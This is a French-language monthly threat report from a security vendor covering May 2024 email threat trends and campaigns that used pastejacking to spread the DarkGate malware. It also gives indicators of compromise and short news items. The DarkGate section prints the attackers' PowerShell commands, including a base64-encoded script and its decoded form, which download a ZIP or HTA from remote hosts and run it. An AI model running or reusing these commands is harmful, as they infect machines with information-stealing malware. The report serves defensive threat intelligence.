Monthly Threat Report Juin 2024 : Nouvelles Campagnes Malveillantes impliquant Darkgate

Vade

13 juin 2024

11 min de lecture

JUN

Le Monthly Threat Report by Hornetsecurity vous donne des informations mensuelles sur les tendances de sécurité M365, les menaces basées sur les emails et des informations sur les événements actuels dans le domaine de la cybersécurité. Cette édition du rapport mensuel sur les menaces se concentre sur les données du mois de mai.

Ce que vous allez découvrir ce mois

  • Les menaces véhiculées par email ont augmenté au cours du mois dernier, la majeure partie de cette augmentation étant attribuée à une augmentation des spams faciles à détecter et nécessitant peu d'efforts.
  • L'utilisation de pièces jointes malveillantes a augmenté au cours du mois de mai, les fichiers d'archives connaissant à eux seuls une augmentation de 13,2 points de pourcentage.
  • Tous les secteurs d'activité ont connu une augmentation d’attaques au cours du mois dernier : les secteurs miniers, du divertissement et des médias étant en tête de liste des secteurs les plus ciblés.
  • Fedex et Facebook ont ​​constaté une forte augmentation des tentatives d'usurpation d'identité de marque.
  • Les experts de Hornetsecurity ont observé une nouvelle campagne distribuant le logiciel malveillant Darkgate en utilisant une technique connue sous le nom de Pastejacking. Ce rapport contient une analyse approfondie et détaillée.
  • Le botnet proxy 911 S5 a été démantelé par les forces de l'ordre américaines et des partenaires internationaux. Il s’agit potentiellement du plus grand démantèlement de botnet à ce jour.
  • Les acteurs malveillants se font passer pour des membres bienveillants de la communauté sur Stackoverflow dans le but d'inciter les utilisateurs à télécharger des packages PyPI malveillants.

 

Overview des menaces

Emails indésirables par catégorie

Le graphique suivant présente la répartition des emails indésirables par catégorie pour avril 2024 par rapport à mai 2024.

mtr_2024-06_types_en

Emails indésirables par catégorie

Nos résultats pour cette période montrent que le volume global des menaces par email a augmenté au cours du mois dernier. Bien qu'il y ait eu une légère augmentation du nombre d'emails classés comme « Menace » et « Menace avancée », l'augmentation la plus importante est toutefois observée dans les emails classés comme « Rejeté ». Il s’agit généralement d’attaques par email nécessitant peu d’effort et facilement détectées comme malveillantes, comme expliqué dans la remarque ci-dessous.

REMARQUE : Pour rappel, la catégorie « Rejeté » fait référence aux emails que les services Hornetsecurity ont rejeté lors du dialogue SMTP en raison de caractéristiques externes, telles que l'identité de l'expéditeur ou l'adresse IP. Si un expéditeur est déjà identifié comme compromis, le système ne procède pas à une analyse plus approfondie. Le serveur SMTP refuse le transfert d’email au point de connexion initial en raison de la réputation négative de l’adresse IP et de l’identité de l’expéditeur.

Les autres catégories de l'image sont décrites dans le tableau ci-dessous :

Catégorie

Description
Spam Ces emails sont indésirables et sont souvent promotionnels ou frauduleux. Les emails sont envoyés simultanément à un grand nombre de destinataires.
Menace

Ces emails contiennent du contenu nuisible, tel que des pièces jointes ou des liens malveillants, ou sont envoyés pour commettre des délits comme le phishing.
Menace avancée

Advanced Threat Protection a détecté une menace dans ces emails. Les emails sont utilisés à des fins illégales et impliquent des moyens techniques sophistiqués qui ne peuvent être repoussés qu'à l'aide de procédures dynamiques avancées.
Rejeté

Notre serveur de messagerie rejette ces emails directement lors de la boîte de dialogue SMTP en raison de caractéristiques externes, telles que l'identité de l'expéditeur, et les emails ne sont pas analysés davantage.

Types de fichiers utilisés dans les attaques par email

Le graphique suivant montre la répartition des types de fichiers utilisés dans les attaques par email tout au long de la période.

mtr_2024-06_threatfiles_en

Principaux types de fichiers dans les attaques par email

Il y a eu une nette augmentation de l’utilisation de pièces jointes malveillantes au cours du dernier mois. Presque tous les types de fichiers ont connu une augmentation significative des utilisations malveillantes. Les fichiers d'archives ont connu une augmentation de 13,2 points de pourcentage par rapport au mois précédent. Les fichiers HTML malveillants ont augmenté de 6,5 points de pourcentage et, étonnamment, les images disque et les fichiers .exe ont également connu une augmentation notable. Il est connu que les auteurs de menaces changent régulièrement de tactique. Il n’est donc pas rare de constater un changement dans les types d’attaques (en exploitant davantage de pièces jointes dans ce cas). Comme toujours, nous continuerons à surveiller cette situation et à signaler toute campagne d'attaque spécifique qui serait à l'origine de ces augmentations.

Indice des emails frauduleux par secteur d’activité

Le graphique suivant présente notre indice de menace email par secteur d’activité, calculé en fonction du nombre d'emails de menace par rapport aux emails légitimes de chaque secteur (en médiane). Différentes organisations reçoivent un nombre d’emails différent. Ainsi, nous calculons la part en pourcentage des emails de menace par rapport aux menaces et aux emails légitimes de chaque organisation pour comparer les organisations. Nous calculons ensuite la médiane de ces pourcentages pour toutes les organisations du même secteur afin de former le score de menace final du secteur.

mtr_2024-06_threatindex_en

Indice des menaces email par secteur d’activité

Après avoir observé une réduction des menaces le mois dernier, nous avons constaté le contraire au cours de cette période de données. Il y a eu une augmentation quasi universelle du ciblage des secteurs au cours du mois dernier, ce qui montre que les attaques contre tous les secteurs ont augmenté. Cela concorde avec nos conclusions générales selon lesquelles le nombre de menaces basées sur les emails a augmenté au cours du mois de mai. Cela dit, les secteurs de la recherche et du divertissement ont connu les augmentations les plus importantes, le secteur minier, du divertissement et des médias venant en tête de liste. Il ressort clairement de nos données que même si certains secteurs verticaux sont ciblés plus que d’autres, la triste vérité est que le type d’organisation que vous êtes n’a pas d’importance. Si vous avez la possibilité de payer une rançon, vous êtes une cible.

Marques et organisations usurpées

Le graphique suivant indique les marques et les organisations que nos systèmes ont le plus détecté lors d'attaques d'usurpation d'identité.

mtr_2024-06_impersonated_en

Marques usurpées

La marque la plus usurpée utilisée dans les attaques par email au cours de la période était clairement Fedex. Cette marque a connu une augmentation massive des tentatives d’usurpation d’identité au cours du mois dernier. Facebook a également constaté une augmentation significative du nombre de menaces par email usurpant l’identité de sa marque.

Découvertes récentes par Hornetsecurity concernant le détournement de Darkgate Pastejacking

Introduction

Le Threat Intelligence and Response Center de Vade (qui fait désormais partie de Hornetsecurity !) a récemment observé un certain nombre de campagnes de phishing malveillantes distribuant Darkgate à l'aide d'une technique inhabituelle appelée Pastejacking. DarkGate est une famille de logiciels malveillants sophistiqués et évolutifs, documentée pour la première fois en 2018, utilisée pour le vol d'informations et les capacités d'accès à distance et connue pour utiliser des techniques d'évasion avancées pour éviter la détection par un logiciel antivirus et d'autres mesures de sécurité.

REMARQUE : L'analyse ci-dessous contient de nombreuses URL dégradées (hxxps au lieu de https). Ceci est fait pour protéger le lecteur des clics accidentels. Il va sans dire que cette documentation est fournie à des fins de recherche et vous ne devez PAS tenter d'utiliser les URL ci-dessous de quelque manière que ce soit, sauf si vous êtes un professionnel de la sécurité qualifié. Hornetsecurity n'est pas responsable de tout dommage résultant de l'utilisation de ces informations.

La Campagne

Les 27 et 28 mai, un total de 105 640 emails de phishing ont été envoyés à partir de domaines contrôlés par 17 acteurs.

Les emails contiennent de brèves phrases conçues pour créer un sentiment d’urgence ou d’autorité, incitant le destinataire à ouvrir la pièce jointe malveillante sous prétexte de devoir réviser ou compléter un document. Ces phrases présentent des techniques de phishing classiques couramment utilisées par les auteurs de menaces.

image1

Un email de phishing prétextant une facture impayée

Un document HTML nommé clarifie_27-May\_{6 chiffres aléatoires}.html ou Scanned_05_28-2024_\_{6 chiffres aléatoires}.html est joint. Une fois ouverte, la page affiche un faux dossier Microsoft OneDrive avec un cercle de chargement, tentant de convaincre la victime qu'un PDF appelé "Reports.pdf" est en train de s'ouvrir.

image2

Un faux cercle de chargement de dossiers OneDrive

Après 2 secondes, le GIF de chargement est masqué et un message d'erreur apparaît indiquant que le document n'a pas pu être ouvert en raison d'une erreur de connexion. Selon le message, le cache DNS doit être mis à jour manuellement pour corriger cette erreur.

image3

Une erreur de connexion nécessite la mise à jour du cache DNS

En raison d'un écouteur d'événements (Event listener) sur le document, lorsqu'une partie de la page est cliquée en dehors de la zone d'erreur, une alerte s'affiche avec le message :

Échec de la connexion au service cloud "OneDrive".

Le bouton « Détails » redirige vers la documentation officielle de Microsoft expliquant comment résoudre les problèmes sur les serveurs DNS.

Lorsque vous cliquez sur le bouton « Comment réparer », un nouveau message apparaît.

image4

Un message expliquant comment corriger l'erreur DNS

Ce message invite la victime à ouvrir un terminal Windows ou une console PowerShell et à coller le contenu du presse-papiers.

Dans le backend, lorsque l'on clique sur le bouton, la fonction JavaScript JJ est appelée qui copie le contenu du titre de la page Web, préalablement décodé par la fonction atob, dans le presse-papiers grâce à la méthode désormais obsolète exeCommand("copy"). Cette technique est appelée Pastejacking.

image5

Le contenu du titre est décodé et copié dans le presse-papiers

Si une victime sans méfiance respecte les instructions, les commandes suivantes sont exécutées :

ipconfig /flushdns

$base64 = "JGppID0gImh0dHBzOi8va29zdHVtbjEuaWxhYnNlcnZlci5jb20vMS56aXAiOw0KJG5lID0gI mM6XFxkb3dubG9hZHMiOw0KTmV3LUl0ZW0gLUl0ZW1UeXBlIERpcmVjdG9yeSAtRm9yY2UgLVB hdGggJG5lOw0KSW52b2tlLVdlYlJlcXVlc3QgLVVyaSAkamkgLU91dEZpbGUgJG5lXHBsLnppc DsNCkNsZWFyLUhvc3Q7DQpFeHBhbmQtQXJjaGl2ZSAkbmVccGwuemlwIC1Gb3JjZSAtZGVzdGl uYXRpb25wYXRoICRuZTsNClJlbW92ZS1JdGVtIC1QYXRoICRuZVxwbC56aXA7DQpTdGFydC1Qc m9jZXNzICRuZVxBdXRvaXQzLmV4ZSAkbmVcc2NyaXB0LmEzeA0KW1N5c3RlbS5SZWZsZWN0aW9 uLkFzc2VtYmx5XTo6TG9hZFdpdGhQYXJ0aWFsTmFtZSgiU3lzdGVtLldpbmRvd3MuRm9ybXMiK TsNCltTeXN0ZW0uV2luZG93cy5Gb3Jtcy5NZXNzYWdlQm94XTo6U2hvdygiVGhlIG9wZXJhdGl vbiBjb21wbGV0ZWQgc3VjY2Vzc2Z1bGx5LCBwbGVhc2UgcmVsb2FkIHRoZSBwYWdlIiwgIlN5c 3RlbSIsIDAsIDY0KTsNCkNsZWFyLUhvc3Q7DQo=";

iex([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64Str ing($base64)));

Set-Clipboard -Value " ";

exit;

La première commande efface le cache du résolveur DNS, obligeant l'ordinateur à supprimer toutes les entrées DNS stockées et à en récupérer de nouvelles sur le serveur DNS. Cette commande ne fait rien de malveillant ; c'est seulement ici dans le but de faire croire à la victime que le faux problème DNS est en train d'être résolu.

Ensuite, une chaîne base64 est décodée et exécutée grâce à l'applet de commande iex PowerShell.

Enfin, le presse-papiers est « nettoyé » en définissant sa valeur sur quatre espaces.

Une fois décodée, la variable $base64 révèle un script PowerShell malveillant :

$ji = "hxxps://kostumn1.ilabserver.com/1.zip";
$ne = "c:\\downloads";
New-Item -ItemType Directory -Force -Path $ne;
Invoke-WebRequest -Uri $ji -OutFile $ne\pl.zip;
Clear-Host;
Expand-Archive $ne\pl.zip -Force -destinationpath $ne;
Remove-Item -Path $ne\pl.zip;
Start-Process $ne\Autoit3.exe $ne\script.a3x
[System.Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms");
[System.Windows.Forms.MessageBox]::Show("The operation completed
successfully, please reload the page", "System", 0, 64);
Clear-Host;

Une fois exécuté, ce script télécharge un document ZIP appelé 1.zip depuis un serveur distant, l'enregistre dans le dossier c:, décompresse le contenu et supprime le ZIP précédemment téléchargé. Ensuite, pour effectuer l'infection, il exécute Autoit3.exe avec script.a3x comme argument.

Enfin, « L'opération s'est terminée avec succès, veuillez recharger la page » s'affiche dans une boîte de message.

image6

1.contenu zip

AutoIt3.exe est l'exécutable du langage de script AutoIt, conçu pour automatiser l'interface graphique Windows et les scripts généraux. Comme l'ont déjà documenté des chercheurs, DarkGate utilise couramment des scripts AutoIt dans le cadre de sa routine d'infection initiale.

image7

L'URL a une activité attribuée au malware DarkGate

Campagnes précédentes

image8

Campagnes précédentes de DarkGate en 2024

17 mai

Le 17 mai, une campagne similaire a eu lieu : environ 43 600 mails ont été envoyés depuis 11 domaines contrôlés par des acteurs.

Un thème Microsoft Office Words a été utilisé pour tromper l'utilisateur en utilisant une approche similaire.

image9

Un leurre Microsoft Word

cmd /c start /min powershell $jr = 'c:\users\public\Dp.hta';
invokewebrequest -uri hxxps://jenniferwelsh.com/header.png -outfile $jr;
startprocess $jr;Set-Clipboard -Value ' ';
exit;

La commande copiée dans le presse-papiers télécharge et exécute un script PowerShell depuis hxxps://jenniferwelsh.com/header.png. Le script est enregistré dans un fichier HTA situé dans c :

image10

HTA malveillant téléchargé depuis un serveur distant

Ce script légèrement obscurci télécharge sa prochaine étape depuis hxxps://mylittlecabbage.net/qhsddxna, un script PowerShell qui télécharge un ZIP depuis hxxp://mylittlecabbage.net/xcdttafq contenant l'exécutable AutoIt3 avec son script.a3x. Le script contient également une chaîne espagnole qui peut être traduite par « ouvrir la calculatrice ».

Le 8 mai

Le 8 mai, environ 57 500 emails de phishing ont été envoyés avec un PDF en pièce jointe invitant la victime à télécharger un faux programme d'installation Java pour accéder à un document.

image11

PDF malveillant incitant la victime à télécharger un faux installateur Java

Le 2 mai

Le 2 mai, une autre campagne utilisant le même thème Microsoft Word a eu lieu : environ 43 600 emails de phishing ont été envoyés.

Victimologie

Basées sur les domaines du destinataire, ces campagnes semblent cibler un large éventail de secteurs et de zones géographiques, reflétant une approche large et opportuniste visant le gain financier. Lors des campagnes des 27 et 28 mai, d'après nos observations, l'Europe occidentale (France, Allemagne et Espagne) et l'Amérique du Nord (États-Unis et Canada) sont au centre des préoccupations. Enfin, cette campagne de phishing a ciblé 75 % de ses efforts vers les secteurs B2B et 25 % vers les secteurs B2C.

Conclusion

Cette recherche met en évidence la façon dont le malware DarkGate continue d’évoluer et reste actif dans le paysage de la cybersécurité. Malgré les efforts continus pour combattre et atténuer son impact, DarkGate a fait preuve de résilience et d'adaptabilité, en maintenant sa présence dans divers vecteurs d'attaque (fausses mises à jour de navigateur ou messages Teams) et en tirant parti de techniques créatives pour atteindre ses objectifs.

L’un des moyens les plus efficaces de se défendre contre de telles menaces consiste à bloquer les emails de phishing, car ceux-ci constituent le principal mécanisme de transmission de nombreux types de logiciels malveillants. Hornetsecurity continuera à surveiller cette menace pour s'assurer que nos clients restent protégés contre ces techniques.

Indicateurs de compromission

Domaines de l'expéditeur du 27 et 28 mai:

  • megabrightsigns[.]com
  • languangjob[.]com
  • top10nursingschools[.]com
  • rumsfeldfinance[.]com
  • quantummerchandise[.]com
  • sonicwarrior[.]org
  • scsho[.]com
  • euthanizerent[.]com
  • xpacgdh[.]com
  • welcomenymegoo[.]com
  • shawlasereye[.]com
  • bloggersua[.]com
  • ruthlesslyfests[.]com
  • shirleymallin[.]com
  • nightstarmusic[.]com
  • rumsfeldsecurity[.]com
  • nightstarmusic[.]com

 

Domaines de l'expéditeur du 17 mai :

  • ethspark[.]com
  • exportersnet[.]com
  • languangjob[.]com
  • yerembe[.]com
  • eiqtechnology[.]com
  • wthome[.]cn
  • gwempresarial[.]com
  • udportuariosdisarp[.]com
  • automobile-locksmith[.]com
  • shanteauconsulting[.]com
  • udportuariosdisarp[.]com

Noms d'utilisateur du 27-28 mai

  • webmaster
  • fastsupport
  • accounting
  • bill
  • contact
  • jessie
  • limited
  • noreply
  • cls
  • gpk
  • support
  • company
  • anna
  • eva
  • information
  • info
  • service
  • alan
  • admin
  • lexisnexis
  • marketing
  • energy
  • springenergy
  • manager
  • global
  • solutions
  • director
  • solutions

Noms d'utilisateur du 17 mai

  • admin
  • support
  • no-reply
  • auto-reply
  • smacleod
  • administrator
  • office
  • usr
  • samer
  • system
  • transfer
  • user
  • office2
  • service
  • info
  • dave
  • transfer

Fichiers SHA-256:

5316fc2cb4c54ba46a42e77e9ee387d158f0f3dc7456a0c549f9718b081c6c26
1.zip

237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d
AutoIt3.exe

493fb733897f4c3d7adf01d663e711e2e47240bfdf5b99abd230aa809f43a8cf
script.a3x

6799222df869a6440bc3372604c36f25efc784292d74901fb2b62695f00acd67
header.png

4b61c21167fbe9a6573fdb6e68889fd4db180e7a8d41b9ee049ca6d54341c8f9
qhsddxna

9a8b0ebe7b18da6e638fdc9f7e1353c56a561419b12932aff6b0a42a7fe6ac12
xcdttafq

0116d3f7e5ecafaf572141a6eaf3bffa80ff04519872be77f07f4b284272db5d
script.a3x

URL:

  • hxxps://kostumn1.ilabserver.com/1.zip
  • hxxps://jenniferwelsh.com/header.png
  • hxxps://mylittlecabbage.net/qhsddxna
  • hxxp://mylittlecabbage.net/xcdttafq
  • hxxps://linktoxic34.com/wp-content/themes/twentytwentytwo/dark.hta
  • hxxps://dogmupdate.com/rdyjyany
  • hxxps://adztrk.com/ouh5d

Autres incidents majeurs et événements

La majeure partie de nos commentaires de ce mois-ci s'est concentrée sur Darkgate. Cela dit, il y a eu d’autres éléments majeurs de l’industrie au cours du mois dernier qui méritent d’être notés.

Le démantèlement du botnet proxy 911 S5

Les forces de l’ordre américaines et leurs partenaires internationaux ont procédé à l’un des plus grands démantèlements de botnet jamais enregistrés. Le directeur du FBI, Christopher Wray, aurait déclaré :

En collaboration avec nos partenaires internationaux, le FBI a mené une cyber-opération conjointe et séquentielle pour démanteler le botnet 911 S5, probablement le plus grand botnet jamais créé au monde.

Le botnet était connu pour englober plus de 19 millions d'adresses IP uniques et était distribué via un certain nombre d'applications VPN, notamment :

  • MasqueVPN
  • DewVPN
  • PaladinVPN
  • Porte proxy
  • BouclierVPN
  • ShineVPN

S’il est bien connu que les botnets sont utilisés pour des activités illégales, le botnet 911 S5 a été utilisé pour des activités extrêmement malveillantes. Le botnet est connu pour être utilisé pour un certain nombre de crimes, notamment la fraude, des ‘bomb threats’, l'exploitation des enfants, le harcèlement, etc.

Le principal opérateur du botnet a également été arrêté dans le cadre du démantèlement, ce qui augmente les chances que le botnet disparaisse après le démantèlement.

Les utilisateurs « bienveillants » de Stackoverflow orientent les gens vers des packages malveillants

L’aide communautaire est l’une des choses qui rend l’industrie technologique si extraordinaire. Les personnes disposées à résoudre un problème technique ou à donner des conseils ne manquent pas. Malheureusement, les auteurs de menaces savent que c’est le cas et chercheront toujours à s’impliquer dans une conversation dans le but final de lancer une attaque.

Ce style d'attaque a récemment fait l'objet d'efforts continus sur Stackoverflow. Les acteurs de la menace se font passer pour des utilisateurs « bienveillants » de la communauté et incitent les gens à télécharger et à utiliser des packages PyPI malveillants. Le référentiel PyPI est un référentiel open source pour les packages que les utilisateurs peuvent utiliser pour les aider dans leurs projets Python. Le référentiel traite des packages malveillants depuis un certain temps déjà et il ne semble pas ralentir compte tenu des nouvelles récentes.

Il va sans dire que lorsque vous trouvez ce qui semble être une solution ou des conseils utiles dans les communautés en ligne, vérifiez et effectuez une évaluation des risques de la solution proposée avant sa mise en œuvre. 10 minutes d’enquête avant la mise en œuvre peuvent éviter à votre organisation bien des ennuis.

 

Recommandations mensuelles

  • Si votre organisation utilise régulièrement les services Fedex, formez le personnel concerné à détecter le nombre toujours croissant d'emails d'usurpation d'identité de la marque Fedex. Un service de sensibilisation à la sécurité de confiance peut vous aider !
  • Lisez les détails des méthodes d'attaque Darkgate que nous montrons ci-dessus et ajustez votre posture de sécurité si nécessaire. Si vous avez besoin d’un logiciel de sécurité de messagerie puissant et de nouvelle génération, nous sommes là pour vous.
  • Si votre organisation utilise des logiciels provenant d'un référentiel public en ligne, prenez le temps d'examiner ce référentiel et de procéder à une évaluation des risques. Les auteurs de menaces utilisent de plus en plus les dépôts de logiciels publics à des fins malveillantes.

 

À propos du Security Lab

Le Security Lab est une division de Hornetsecurity dédiée à l’analyse approfondie des menaces de sécurité les plus courantes et critiques, avec une spécialisation en sécurité des e-mails. L’équipe internationale de spécialistes en sécurité possède une vaste expérience en recherche en sécurité, ingénierie logicielle et science des données.

Une compréhension approfondie du paysage des menaces, fondée sur l’analyse pratique de virus réels, d’attaques de phishing, de logiciels malveillants et autres, est cruciale pour développer des contre-mesures efficaces. Les informations détaillées collectées par le Security Lab constituent la base des solutions de cybersécurité de nouvelle génération proposées par Hornetsecurity.